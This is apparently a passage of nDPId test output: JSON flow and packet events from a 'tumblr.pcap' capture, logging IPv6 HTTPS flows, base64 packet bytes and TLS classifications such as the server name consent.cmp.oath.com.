KCsWaODSJH8qsgcj27KMOqJKDEttTsUUejaBrXacD1ursBsQeG6kxeWCpc+pc+B6lF82QSaY+dqDc0x6adlVhzh25sn9xUc5gttNEqsRpcCwXleCFl5slq6Eo208ayh44XAy4\/3sSIcuuXZecriDdQNtCpH0D9WnZpbvC6F0uUd8YgEMLKpbVgkphXTjpgJPqNLHR1Jtsu8T0zduHUyA8I2rMdecA7vfO5m6vB6zg"} -00614{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292103804,"flow_last_seen":1605292103804,"flow_idle_time":7440000,"flow_min_l4_payload_len":644,"flow_max_l4_payload_len":644,"flow_tot_l4_payload_len":644,"flow_avg_l4_payload_len":644,"midstream":1,"thread_ts_msec":1605292103804,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::8fcc:d927","src_port":57286,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01367{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1605292103804,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":730,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":730,"pkt_l4_len":676,"thread_ts_msec":1605292103804,"pkt":"qtsDr8lk5EKm5WPyht1gC36AAqQGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACPzNkn38YBu3OPNREQMJOagBgB9f9ZAAABAQgKI0OBn8LdXfIXAwMCf+a7XKOkxtVKJI04EV4D3mT6IiNw5ZdwpK\/ctvLby5AnUtCRp1wz9iXgvd8CBQl59Ed1wqXQfvbQcvgr9o4GGMRVH8BPyBiK9wAHxfoair+VUOV+cUyNlvDKwuPaUh\/47DlY44LAL0vv9eo4G0vPSmnyuohMST6JkC52HBED7hDgCc5lbkYutM3P7xGL1Z5MrmmzLXVyM4doUQOUayCKfyqRux1EiZDMeHsdoHvinwuW98Zns+5LqMwEKiz9\/ZA1Iu594xbEmeMockAnjj3HmV8YsDERU2TzTk3sWn0ZhKp12Rdx11cVSOnv1ddUqmkYpF6VPIBgfZdY0+3WEYNWwp9gOeZ1SPKEW1sZa\/MZbqxYU+ge0aUNP414S6YsDr4wWnXY\/hrIPt4hdVJid3p8HC+BYX8NVuisAelA3CsslL+yrlEZs\/QElNY2EIBitMqJSsgpwlduIlvcGoykV3DYfMjS3smQ0\/HaV+vGuY59BD+HYzkVJoRFJ5+AoB\/9kz8MrwgQrulG8+mXwGs2Tz+e0pxggDcl3iaCIQO5yUqOapIz\/jo8gXQAUjpsoKRzsKjRY\/OKBL3cj5DbujlngZrs+3yRDxMp\/A8kmIYDSMjyy21do9HW47erPa0WwNSepOx56UCCZyny26AleUHgV47LLX+Hh0DKxyVNOlUl474o9ZULR18pA1FtXPbynHGzdWF0peqNAJdGXSpxCnSDK+dkiaw9fmAlL\/EwEDJgbnaFqYBoa1wzZSNmUTmn9uQt7gG5UTLglNz7Gtm2hHwfzEK4uAknhpJOuKuRvE3auX9h725wqrVluU5SCPoyvKwHHRb0nBQK3ngxp6Haaq8pgOXbmw=="} -00554{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1605292103806,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":132,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":132,"pkt_l4_len":78,"thread_ts_msec":1605292103806,"pkt":"qtsDr8lk5EKm5WPyht1gDK9YAE4GQCoBywEgSYsHmR3shSjf9ikmIAEWgA0AIYxuzywI1p+1oTIBu9ziGQ26Ce2BgBgB9dicAAABAQgKOMLykMLdWyEXAwMAKQAAAAAAAAAF+jUU1elIEFUi9UepC3cLGnJUpit7lClItBx8Gs+U4NeE"} -00546{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1605292103807,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":125,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":125,"pkt_l4_len":71,"thread_ts_msec":1605292103807,"pkt":"qtsDr8lk5EKm5WPyht1gC36AAEcGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACPzNkn38YBu3OPN5UQMJOagBgB9TxfAAABAQgKI0OBosLdXfIXAwMAIkCDsSUDRd2gtpG1ie0hMvlOrf1SL9AYeSm49w1LAyMVmmo="} -00615{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292103810,"flow_last_seen":1605292103810,"flow_idle_time":7440000,"flow_min_l4_payload_len":382,"flow_max_l4_payload_len":382,"flow_tot_l4_payload_len":382,"flow_avg_l4_payload_len":382,"midstream":1,"thread_ts_msec":1605292103810,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::98c7:1593","src_port":42908,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01015{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1605292103810,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":468,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":468,"pkt_l4_len":414,"thread_ts_msec":1605292103810,"pkt":"qtsDr8lk5EKm5WPyht1gCmLwAZ4GQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACYxxWTp5wBu7LtL87ROW\/JgBgB9bw+AAABAQgKM4zEpsLdXIMXAwMBeeuGCWF9Lb0Ci6TEBMXMSCRU5\/ujX\/oVXdGh+BNpGjYWczn5t9MnrcPf0zR8Rsvgek65i+QCA5M9xg538hLyui9336X\/wmAqUKW0ovcGHfVkBbInk26LgYglI5Td\/ssdGWORhYySPbJXLEFtu\/h1mXhj5XU6VyNxU9SBh\/8O12l+trWyWdbANDOIW9SbvtVRvHBRVZmz1ag3okb4Plbrh4Qi4B+G74t5h0\/qMYjiEuZ1+PtpSHBW9OPbPwwcOV4UZ67nf4PG8vUha9JOewT6Ihb4Yfc7EBAGx7VHrcHsn7dvXiF8gTt9bh55AJVAbM2ak8Yu6DoJnJsa+jvwTKddiAxdtJhT3E7fBmbothroFA49N5AzGnFsh4cxhtIWJBj0s+8J1Phi\/75LUnCD0lYbxKIDoOKf0QWR08Jx8MCXKqwRPsjDU42Fi\/URG4BOwibUPBjlxMt8e\/Bx1zwNGX2TOl3lRdKcwrnMTh58G0mfgl41Ox0e5b1fEr4M"} -00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1605292103811,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":125,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":125,"pkt_l4_len":71,"thread_ts_msec":1605292103811,"pkt":"qtsDr8lk5EKm5WPyht1gCmLwAEcGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACYxxWTp5wBu7LtMUzROW\/JgBgB9W6tAAABAQgKM4zEp8LdXIMXAwMAIinMMkxOhnFjQLjLSAyia+Ge5bjIivBAhB3nTGih+nlOG64="} -00555{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1605292103882,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":132,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":132,"pkt_l4_len":78,"thread_ts_msec":1605292103882,"pkt":"qtsDr8lk5EKm5WPyht1gDK9YAE4GQCoBywEgSYsHmR3shSjf9ikmIAEWgA0AIYxuzywI1p+1oTIBu9ziGQ26Ce2BgBgB9dhQAAABAQgKOMLy3MLdWyEXAwMAKQAAAAAAAAAF+jUU1elIEFUi9UepC3cLGnJUpit7lClItBx8Gs+U4NeE"} -00547{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1605292103890,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":125,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":125,"pkt_l4_len":71,"thread_ts_msec":1605292103890,"pkt":"qtsDr8lk5EKm5WPyht1gC36AAEcGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACPzNkn38YBu3OPN5UQMJOagBgB9TwMAAABAQgKI0OB9cLdXfIXAwMAIkCDsSUDRd2gtpG1ie0hMvlOrf1SL9AYeSm49w1LAyMVmmo="} -00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1605292103902,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":125,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":125,"pkt_l4_len":71,"thread_ts_msec":1605292103902,"pkt":"qtsDr8lk5EKm5WPyht1gCmLwAEcGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACYxxWTp5wBu7LtMUzROW\/JgBgB9W5SAAABAQgKM4zFAsLdXIMXAwMAIinMMkxOhnFjQLjLSAyia+Ge5bjIivBAhB3nTGih+nlOG64="} -00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292104650,"flow_last_seen":1605292104650,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292104650,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1605292104650,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292104650,"pkt":"qtsDr8lk5EKm5WPyht1gBEqMACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABo9CrI3c4Bu\/+MQoWdXXNVgBAB9YSyAAABAQgKTYTpp8Lc6wE="} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1605292104716,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292104716,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAGj0KsgqAcsBIEmLB5kd7IUo3\/YpAbvdzp1dc1X\/jEKGgBAMSBTRAAABAQgKwt2b\/U1+nj4="} -00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":57,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292103810,"flow_last_seen":1605292105112,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":12081,"flow_avg_l4_payload_len":377,"midstream":1,"thread_ts_msec":1605292105112,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::98c7:1593","src_port":42908,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00675{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292103810,"flow_last_seen":1605292105112,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":12081,"flow_avg_l4_payload_len":377,"midstream":1,"thread_ts_msec":1605292105112,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::98c7:1593","src_port":42908,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00615{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":87,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105170,"flow_last_seen":1605292105170,"flow_idle_time":7440000,"flow_min_l4_payload_len":160,"flow_max_l4_payload_len":160,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":160,"midstream":1,"thread_ts_msec":1605292105170,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43420,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00716{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1605292105170,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":246,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":246,"pkt_l4_len":192,"thread_ts_msec":1605292105170,"pkt":"qtsDr8lk5EKm5WPyht1gDdvHAMAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0oqZwBuzRq\/HZTRuvUgBgSELhfAAABAQgKdG+lysLdLW8XAwMAm7+VUv5v3n1cEKhvA7Obmk7hW69laavu9OZNOdP5v2aiE9LYEKQeHffn7vm6VstuW5LB+GPd1bdCCYxPrQ8cpXXvSrRBde7Ubgvulsw\/eGF6vJKgoYXL5h04lY18ojPm\/cV9tUPretg64t\/hG52\/jXKkQ9+5e1GR1KuJgn1MWQ\/97vN82J\/Jt388ivkqQMfP0T\/jvMqs33Elwytq"} -00699{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1605292105170,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":237,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":237,"pkt_l4_len":183,"thread_ts_msec":1605292105170,"pkt":"qtsDr8lk5EKm5WPyht1gDdvHALcGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0oqZwBuzRq\/RZTRuvUgBgSEKKhAAABAQgKdG+ly8LdLW8XAwMAazorJ+v8Qql\/1vWfAai2gkZCI3DTL5oADrcU2MSE9kWZdYS8Jqpk4fHfL5KS3jLCf57oTjL53SDsaGk+gIvtoan6S0MuUK39MyCSYP90lEM7cfvMMDv9MYZwBU7ADMu7jSPLRoIxvW6l0Cl8FwMDACLudklu9KmRe2M4B\/MpTRVuBpiUQvjz3VbQML7h4xLHHM4W"} -00615{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":89,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105171,"flow_last_seen":1605292105171,"flow_idle_time":7440000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":1,"thread_ts_msec":1605292105171,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43434,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1605292105171,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":198,"pkt_l4_len":144,"thread_ts_msec":1605292105171,"pkt":"qtsDr8lk5EKm5WPyht1gCnTDAJAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0oqaoBuwynxfpsKg54gBgd\/fuUAAABAQgKdG+ly8LdWR0XAwMAa1HIP\/vnAAogIw4J2B2TkEHONIFMeD5XyAVKi4Q2Vue2Mstte\/aj9aBEGnaC\/XLTSleNDPxB5FKFlYuKlZTTvSjcjRkZVdPHhikw9Xf3PTuX4sNc4A4aMrxDB+2xDdlSgUdvbOv4DPatYzp8"} -00551{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1605292105171,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":125,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":125,"pkt_l4_len":71,"thread_ts_msec":1605292105171,"pkt":"qtsDr8lk5EKm5WPyht1gCnTDAEcGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0oqaoBuwynxmpsKg54gBgd\/YTsAAABAQgKdG+lzMLdWR0XAwMAIlHp65gwK7PBPS\/ZXxVrtwWRv5u\/D1Oka\/7+0BiFD1N3mso="} -00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1605292105176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":197,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":197,"pkt_l4_len":143,"thread_ts_msec":1605292105176,"pkt":"qtsDr8lk5EKm5WPyht1gCnTDAI8GQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0oqaoBuwynxpFsKg54gBgd\/f4EAAABAQgKdG+l0cLdWR0XAwMAau+1WhRe96DKEz4O2DiVS\/91xsnWseh+6lrx3LgaqNmDXwRm1lqF7AcLtXkaV8D99qMpoGwTJnk5i4\/A5jdKnihSC+92twzKrr9YRFj27xUmeqz0tGED25O9+HkuuOkV2W5IN6Z8o+lbpTM="} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1605292105195,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292105195,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAMAATSgqAcsBIEmLB5kd7IUo3\/YpAbupnFNG69Q0av0WgBAMvoDtAAABAQgKwt2d3XRvpco="} -00627{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":95,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105197,"flow_last_seen":1605292105197,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605292105197,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58380,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1605292105197,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292105197,"pkt":"qtsDr8lk5EKm5WPyht1gCsuaACgGQCoBywEgSYsHmR3shSjf9ikmBigAATUVWiO6Cyol\/xIt5AwBu6fu9OYAAAAAoAL9IHL6AAACBAWgBAIIClFT82IAAAAAAQMDBw=="} -00675{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":128,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292105170,"flow_last_seen":1605292105221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":12369,"flow_avg_l4_payload_len":386,"midstream":1,"thread_ts_msec":1605292105221,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43420,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00676{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":128,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292105170,"flow_last_seen":1605292105221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":12369,"flow_avg_l4_payload_len":386,"midstream":1,"thread_ts_msec":1605292105221,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43420,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":146,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1605292105230,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292105230,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSYGKAABNRVaI7oLKiX\/Ei0qAcsBIEmLB5kd7IUo3\/YpAbvkDMLhfl2n7vTnoBJXgHalAAACBAV4AQMDAwQCCArC3Z3zUVPzYg=="} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":150,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1605292105230,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292105230,"pkt":"qtsDr8lk5EKm5WPyht1gCsuaACAGQCoBywEgSYsHmR3shSjf9ikmBigAATUVWiO6Cyol\/xIt5AwBu6fu9OfC4X5egBAB+\/qVAAABAQgKUVPzg8LdnfM="} -00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":154,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292105197,"flow_last_seen":1605292105231,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605292105231,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58380,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"consent.cmp.oath.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00675{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":158,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292105171,"flow_last_seen":1605292105231,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":17162,"flow_avg_l4_payload_len":536,"midstream":1,"thread_ts_msec":1605292105231,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43434,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00676{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":158,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292105171,"flow_last_seen":1605292105231,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":17162,"flow_avg_l4_payload_len":536,"midstream":1,"thread_ts_msec":1605292105231,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43434,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00628{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":345,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105274,"flow_last_seen":1605292105274,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605292105274,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58382,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1605292105274,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292105274,"pkt":"qtsDr8lk5EKm5WPyht1gA8c5ACgGQCoBywEgSYsHmR3shSjf9ikmBigAATUVWiO6Cyol\/xIt5A4Bu+LGvZYAAAAAoAL9IG8jAAACBAWgBAIIClFT868AAAAAAQMDBw=="} -00994{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":369,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292105197,"flow_last_seen":1605292105278,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1605292105278,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58380,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"consent.cmp.oath.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 